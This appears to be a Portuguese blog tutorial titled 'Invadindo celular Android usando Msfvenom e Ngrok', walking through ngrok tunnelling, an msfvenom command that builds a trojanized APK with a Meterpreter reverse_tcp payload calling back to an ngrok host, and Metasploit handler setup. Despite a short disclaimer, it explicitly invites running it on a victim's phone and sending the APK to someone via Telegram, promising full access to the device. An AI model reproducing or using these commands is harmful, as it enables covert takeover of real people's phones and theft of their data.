Executando verificação de segurança...
3

Invadindo celular Android usando Msfvenom e Ngrok

O conteúdo que se apresenta nesse artigo e destinado aos profissionais e estudantes de Segurança da Informação. Não nos responsabilizamos pelo maus uso das técnicas apresentadas.

Olá, neste artigo estarei abordando a criação Backdoor com o msfvenom de uma simples shell reversa com Metasploit Framework e Meterpreter, onde iremos criar um .apk infectado que quando executado na máquina da vítima, cria uma conexão reversa com nossa máquina nos dando permissões de administrador ao seu celular

Irei utilizar o ngrok para fazer um túnel de conexão sem eu ter que abrir portas do roteador para me conectar fora da rede externa.

Bora começar

Primeiramente iremos abrir o ngrok ( caso você não tenha, leia meu artigo anterior: Usando Ngrok no kali linux que eu explico como realizar o download)

ngrok tcp 22

Iremos ter que Utilizar o nosso FORWARDING TCP como o LHOST e o 12643 como LPORT

Lembrando que cada um tem o seu FORWARDING

imagem1

Vamos criar e encodar o payload com o msfvenom, Estaremos utilizando um payload de reverse_TCP.

Onde:

p : Iremos definir o Payload a ser utilizado
LHOST e LPORT : Iremos definir respectivamente o TCP do Ngrok e Porta do ngrok também que o alvo irá se conectar na nossa máquina após a infecção
R > : o caminho de onde queremos criar e o nome do APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=12643 R > /root/Documentos/medium.apk
Se a gente entrar na pasta Documentos iremos encontrar ele lá

imagem2

Iniciando o Metasploit e Manipulando as sessões
Agora iremos abrir o msfconsole siga os comando

#msfconsole
msf > use exploit/multi/handler
msf >set PAYLOAD android/meterpreter/reverse_tcp
msf >set LHOST 127.0.0.1
msf >set LPORT 22
msf > exploit
Agora é só testar se tudo esta funcionando. Nesse caso irei realizar um emulador pra realizar a invasão, mas você pode realizar em um celular de uma vítima.

Utilizei meu Telegram para enviar o apk para o emulador Android, mas você pode utilizar outro métodos para enviar o apk para alguém

Iniciando a sessão com a vítima

imagem3

Agora é só clicar em abrir

imagem4

Conseguimos, tudo deu certo! Agora temos acesso total do celular da vitima.

irei

imagem4

Agora é só você utilizar os comandos para explorar as informações da vítima.

imagem5

Carregando publicação patrocinada...